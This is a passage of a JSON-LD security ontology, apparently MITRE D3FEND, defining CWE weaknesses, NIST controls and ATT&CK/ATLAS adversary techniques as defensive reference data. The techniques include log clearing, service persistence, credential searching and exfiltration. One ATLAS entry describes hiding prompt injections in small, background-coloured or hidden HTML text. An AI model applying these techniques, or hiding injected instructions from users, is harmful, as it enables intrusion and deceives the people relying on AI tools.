      "@id": "d3f:WindowsNtCreateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a new file or directory, or opens an existing file, device, directory, or volume.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntcreatefile"
      },
      "rdfs:label": "Windows NtCreateFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:WebNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Web network traffic is network traffic that uses a standard web protocol.",
      "rdfs:label": "Web Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-607",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-607",
      "d3f:definition": "A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package.",
      "rdfs:label": "Public Static Final Field References Mutable Object",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-471"
      }
    },
    {
      "@id": "d3f:RFShielding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RFShielding"
      ],
      "d3f:d3fend-id": "D3-RFS",
      "d3f:definition": "Adding physical barriers to a platform to prevent undesired radio interference.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PrivacyAndSecuritySystemsAndMethodsOfUse"
        },
        {
          "@id": "d3f:Reference-Technical_Specifications_for_Construction_and_Management_of_Sensitive_Compartmented_Information_Facilities"
        }
      ],
      "rdfs:label": "RF Shielding",
      "rdfs:subClassOf": {
        "@id": "d3f:ElectromagneticRadiationHardening"
      }
    },
    {
      "@id": "d3f:Datalog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DAT",
      "d3f:definition": "Datalog is a declarative logic programming language that is a syntactically a subset of Prolog.",
      "d3f:kb-article": "## How it works\nDatalog generally uses a bottom-up rather than top-down evaluation model. This difference yields significantly different behavior and properties from Prolog. It is often used as a query language for deductive databases. Datalog has been applied to problems in data integration, networking, program analysis, and more.\n\n## References\n1. Datalog. (2023, April 20). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Datalog)",
      "rdfs:label": "Datalog",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:T1543.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.003",
      "d3f:definition": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "Windows Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N473e2b99d6234815a3d3de0cb3b6f836"
        }
      ]
    },
    {
      "@id": "_:N473e2b99d6234815a3d3de0cb3b6f836",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:T1070.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.001",
      "d3f:definition": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.",
      "d3f:modifies": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Clear Windows Event Logs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N7f74cf5c30e448f290e21c11a6d65a58"
        }
      ]
    },
    {
      "@id": "_:N7f74cf5c30e448f290e21c11a6d65a58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:OrchestrationController",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ContainerOrchestrationSoftware"
      },
      "d3f:definition": "An orchestration server provides orchestration services that automate the configuration, coordination, and management of computer systems and software.",
      "rdfs:label": "Orchestration Controller",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OrchestrationServer"
        },
        {
          "@id": "_:Nb0ea41c690e3490abeb5f0237ddd78c2"
        }
      ]
    },
    {
      "@id": "_:Nb0ea41c690e3490abeb5f0237ddd78c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerOrchestrationSoftware"
      }
    },
    {
      "@id": "d3f:OTSecurityCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Ensure confidentiality, integrity, or availability of system information.",
      "rdfs:label": "OT Security Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTNetworkManagementCommandEvent"
        },
        {
          "@id": "_:N73e48c1939f343988aff8597ba091b8a"
        }
      ]
    },
    {
      "@id": "_:N73e48c1939f343988aff8597ba091b8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSecurityCommand"
      }
    },
    {
      "@id": "d3f:NTFSJunctionPoint",
      "@type": "owl:Class",
      "d3f:definition": "NTFS junction points are are similar to NTFS symlinks but are defined only for directories. Only accepts local absolute paths.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:NTFS_links"
      },
      "rdfs:label": "NTFS Junction Point",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTFSLink"
        },
        {
          "@id": "d3f:SymbolicLink"
        }
      ],
      "skos:altLabel": "Junction Point"
    },
    {
      "@id": "d3f:CWE-51",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-51",
      "d3f:definition": "The product accepts path input in the form of multiple internal slash ('/multiple//internal/slash/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '/multiple//internal/slash'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:CWE-1038",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1038",
      "d3f:definition": "The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security assumption.",
      "rdfs:label": "Insecure Automated Optimizations",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-435"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:CWE-916",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-916",
      "d3f:definition": "The product generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.",
      "rdfs:label": "Use of Password Hash With Insufficient Computational Effort",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-327"
        },
        {
          "@id": "d3f:CWE-328"
        }
      ]
    },
    {
      "@id": "d3f:Page",
      "@type": "owl:Class",
      "d3f:definition": "A page, memory page, logical page, or virtual page is a fixed-length contiguous block of virtual memory, described by a single entry in the page table. It is the smallest unit of data for memory management in a virtual memory operating system.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Page_(computer_memory)"
      },
      "rdfs:label": "Page",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:SPARTATactic",
      "@type": "owl:Class",
      "d3f:definition": "SPARTA Tactics represent the 'why' of a SPARTA technique. They denote the tactical goal of a threat actor and the reason for performing a technique.",
      "rdfs:label": "SPARTA Tactic",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/SPARTA"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAThing"
      }
    },
    {
      "@id": "d3f:T1552.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:PrivateKey"
      },
      "d3f:attack-id": "T1552.004",
      "d3f:definition": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.",
      "rdfs:label": "Private Keys",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N7f930fa1f9464df6ab15dc68a4fff9a5"
        }
      ]
    },
    {
      "@id": "_:N7f930fa1f9464df6ab15dc68a4fff9a5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrivateKey"
      }
    },
    {
      "@id": "d3f:FileServer",
      "@type": "owl:Class",
      "d3f:definition": "The term server highlights the role of the machine in the traditional client-server scheme, where the clients are the workstations using the storage. A file server does not normally perform computational tasks or run programs on behalf of its client workstations. File servers are commonly found in schools and offices, where users use a local area network to connect their client computers.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:File_server"
      },
      "rdfs:label": "File Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:CWE-822",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-822",
      "d3f:definition": "The product obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer.",
      "d3f:weakness-of": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "rdfs:label": "Untrusted Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:Nc4137d3cbccc49d8ad2bfafa88e96427"
        }
      ]
    },
    {
      "@id": "_:Nc4137d3cbccc49d8ad2bfafa88e96427",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:CWE-392",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-392",
      "d3f:definition": "The product encounters an error but does not provide a status code or return value to indicate that an error has occurred.",
      "rdfs:label": "Missing Report of Error Condition",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-684"
        },
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:FileHeaderBlockSignature",
      "@type": "owl:Class",
      "d3f:definition": "A sequence of bytes used to identify and validate specific header sections within a file.",
      "rdfs:label": "File Header Block Signature",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:SoftwareClockEvent",
      "@type": "owl:Class",
      "d3f:definition": "A clock event involving a software-based timekeeping mechanism maintained by an operating system or application.",
      "rdfs:label": "Software Clock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ClockEvent"
        },
        {
          "@id": "_:Nef70702914574ac0b58272a069c826de"
        }
      ]
    },
    {
      "@id": "_:Nef70702914574ac0b58272a069c826de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareClock"
      }
    },
    {
      "@id": "d3f:CWE-1087",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1087",
      "d3f:definition": "A class contains a virtual method, but the method does not have an associated virtual destructor.",
      "rdfs:label": "Class with Virtual Method without a Virtual Destructor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:carried-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x carried-by y: The information entity x is dependent upon the entity y for its storage, transport, or communication. Entity y serves as the necessary bearer or link from which x can be recovered or interpreted.",
      "owl:inverseOf": {
        "@id": "d3f:carries"
      },
      "rdfs:label": "carried-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-552",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-552",
      "d3f:definition": "The product makes files or directories accessible to unauthorized actors, even though they should not be.",
      "rdfs:label": "Files or Directories Accessible to External Parties",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-285"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:creates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x creates y: The subject x brings into existence an object y. Some technique or agent x creates a persistent digital artifact y (as opposed to production of a consumable or transient object.); i.e., bring forth or generate.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01630392-v"
      },
      "rdfs:label": "creates",
      "rdfs:seeAlso": {
        "@id": "d3f:produces"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-create"
        }
      ]
    },
    {
      "@id": "d3f:TunnelOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network tunnel is established, enabling encapsulated communication between endpoints. This marks the initiation of secure or isolated data transport through the tunnel.",
      "rdfs:label": "Tunnel Open Event",
      "rdfs:subClassOf": {
        "@id": "d3f:TunnelEvent"
      }
    },
    {
      "@id": "d3f:DS0034",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Volume (ATT&CK DS)"
    },
    {
      "@id": "d3f:Reference-PointerValidationFunction_SEI",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://wiki.sei.cmu.edu/confluence/display/c/MEM10-C.+Define+and+use+a+pointer+validation+function"
      },
      "d3f:kb-organization": "Software Engineering Institute",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:NullPointerChecking"
        },
        {
          "@id": "d3f:PointerValidation"
        }
      ],
      "d3f:kb-reference-title": "SEI CERT C Coding Standard",
      "rdfs:label": "Reference - Pointer Validation Function - SEI"
    },
    {
      "@id": "d3f:CWE-1291",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1291",
      "d3f:definition": "The same public key is used for signing both debug and production code.",
      "rdfs:label": "Public Key Re-Use for Signing both Debug and Production Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Trusted Distribution",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PlatformHardening"
        }
      ],
      "rdfs:label": "SA-10(6)"
    },
    {
      "@id": "d3f:AML.T0068",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0068",
      "d3f:definition": "Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.\n\nThis may include modifying how the injection is rendered such as small text, text colored the same as the background, or hidden HTML elements.",
      "rdfs:label": "LLM Prompt Obfuscation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0068"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "LLM Prompt Obfuscation"
    },
    {
      "@id": "d3f:NTPClientSyncEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP client requests and adjusts its clock based on time synchronization data provided by an NTP server, ensuring alignment with a standard time source.",
      "rdfs:label": "NTP Client Synchronization Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_30",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Filter Mechanisms Using Multiple Processes",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(30)"
    },
    {
      "@id": "d3f:CWE-125",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-125",
      "d3f:definition": "The product reads data past the end, or before the beginning, of the intended buffer.",
      "d3f:synonym": "OOB read",
      "d3f:weakness-of": {
        "@id": "d3f:RawMemoryAccessFunction"
      },
      "rdfs:label": "Out-of-bounds Read",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:N8b47a9e36da44c4c871a954c5023e6e4"
        }
      ]
    },
    {
      "@id": "_:N8b47a9e36da44c4c871a954c5023e6e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "d3f:HardwareDeviceBindEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device is logically bound to a system or process, typically for exclusive use or integration with specific software components.",
      "rdfs:label": "Hardware Device Bind Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceStateEvent"
      }
    },
    {
      "@id": "d3f:T1222",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1222",
      "d3f:definition": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "File and Directory Permissions Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:Ne2d3eef81e7c41b9ab0f519b47f98b3c"
        }
      ]
    },
    {
      "@id": "_:Ne2d3eef81e7c41b9ab0f519b47f98b3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:T1048",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over Alternative Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N3eeb286b064b42e1913d94bb9add60a8"
        }
      ]
    },
    {
      "@id": "_:N3eeb286b064b42e1913d94bb9add60a8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-337",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-337",
      "d3f:definition": "A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.",
      "rdfs:label": "Predictable Seed in Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-335"
      }
    },
    {
      "@id": "d3f:CWE-302",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-302",
      "d3f:definition": "The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.",
      "rdfs:label": "Authentication Bypass by Assumed-Immutable Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-807"
        }
      ]
    },
    {
      "@id": "d3f:File",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:FileSection"
      },
      "d3f:definition": "A file maintained in computer-readable form.",
      "d3f:may-contain": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "File",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06521201-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Resource"
        },
        {
          "@id": "_:N18fbdad6c0e14c8a873f23f134c1dd04"
        },
        {
          "@id": "_:Nff27bae444cf40a782881b14cd6cf197"
        },
        {
          "@id": "_:N88f4dc3992374ed890d28ce8f6a3a8ca"
        }
      ]
    },
    {
      "@id": "_:N18fbdad6c0e14c8a873f23f134c1dd04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "_:Nff27bae444cf40a782881b14cd6cf197",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N88f4dc3992374ed890d28ce8f6a3a8ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:CWE-648",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-648",
      "d3f:definition": "The product does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly.",
      "rdfs:label": "Incorrect Use of Privileged APIs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:Reference-InstantProcessTerminationToolToRecoverControlOfAnInformationHandlingSystem_DellProductsLP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20060236108A1/en"
      },
      "d3f:kb-abstract": "A method and system for automatic termination of unauthorized malevolent processes operating on an information handling system. A list of authenticated and essential process list is stored on the information handling system. Unauthorized processes not contained on the list can be automatically terminated by the user by invoking the present invention with a single click of a mouse or pointer device on an icon residing on the display screen of the information handling system. The offending processes are immediately terminated without generating a user prompt, which would ordinarily provide sufficient time for the malware to spawn additional offending processes. The present invention also provides significant means to recover control of a malware-infected information handling system in order to use repair tools and utilities. The present invention can be deployed at the time of manufacture of an information handling system or independently installed by a user.",
      "d3f:kb-author": "Carlton Andrews",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Dell Products LP",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:kb-reference-title": "Instant process termination tool to recover control of an information handling system",
      "rdfs:label": "Reference - Instant process termination tool to recover control of an information handling system - Dell Products LP"
    },
    {
      "@id": "d3f:CommandLineInterface",
      "@type": "owl:Class",
      "d3f:definition": "A command-line interface or command language interpreter (CLI), also known as command-line user interface, console user interface, and character user interface (CUI), is a means of interacting with a computer program where the user (or client) issues commands to the program in the form of successive lines of text (command lines). Command-line interfaces to computer operating systems are less widely used by casual computer users, who favor graphical user interfaces. Programs with command-line interfaces are generally easier to automate via scripting.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Command-line_interface"
      },
      "rdfs:label": "Command Line Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:UserInterface"
      },
      "skos:altLabel": [
        "CLI",
        "CUI",
        "Command-line Interface"
      ]
    },
    {
      "@id": "d3f:RDPConnectResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP server acknowledges a connection request, finalizing session parameters and confirming the transition to an interactive remote session.",
      "rdfs:label": "RDP Connect Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RDPEvent"
        },
        {
          "@id": "_:Nbaa684a73e5f4b3dbddc39ec471b8034"
        }
      ]
    },
    {
      "@id": "_:Nbaa684a73e5f4b3dbddc39ec471b8034",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPConnectRequestEvent"
      }
    },
    {
      "@id": "d3f:AML.T0063",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0063",
      "d3f:definition": "Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses.\nModel outputs may enable the adversary to identify weaknesses in the model and develop attacks.",
      "rdfs:label": "Discover AI Model Outputs - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0063"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Model Outputs"
    },
    {
      "@id": "d3f:ElectricalSignal",
      "@type": "owl:Class",
      "d3f:definition": "Time-varying voltage or current that carries information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Signal"
      },
      "rdfs:label": "Electrical Signal",
      "rdfs:subClassOf": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:AML.T0055",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0055",
      "d3f:definition": "Adversaries may search compromised systems to find and obtain insecurely stored credentials.\nThese credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system, or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).",
      "rdfs:label": "Unsecured Credentials - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0055"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "Unsecured Credentials"
    },
    {
      "@id": "d3f:ProcessEnvironmentVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An environment variable is a dynamic-named value that can affect the way running processes will behave on a computer. They are part of the environment in which a process runs.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Environment_variable"
      },
      "rdfs:label": "Process Environment Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "skos:altLabel": "Environment Variable"
    },
    {
      "@id": "d3f:CWE-1254",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1254",
      "d3f:definition": "The product's comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes.",
      "rdfs:label": "Incorrect Comparison Logic Granularity",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-208"
        },
        {
          "@id": "d3f:CWE-697"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ServiceBinaryModifications_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-02-001/"
      },
      "d3f:kb-abstract": "Adversaries may modify the binary file for an existing service to achieve Persistence while potentially evading defenses. If a newly created or modified binary runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ServiceBinaryVerification"
      },
      "d3f:kb-reference-title": "CAR-2014-02-001: Service Binary Modifications",
      "rdfs:label": "Reference - CAR-2014-02-001: Service Binary Modifications - MITRE"
    },
    {
      "@id": "d3f:CWE-783",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-783",
      "d3f:definition": "The product uses an expression in which operator precedence causes incorrect logic to be used.",
      "rdfs:label": "Operator Precedence Logic Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:AML.T0016",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016",
      "d3f:definition": "Adversaries may search for and obtain software capabilities for use in their operations.\nCapabilities may be specific to AI-based attacks [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular AI-enabled system.",
      "rdfs:label": "Obtain Capabilities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Obtain Capabilities"
    },
    {
      "@id": "d3f:CCI-001169_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the download of organization-defined unacceptable mobile code.",
      "d3f:member-of": {
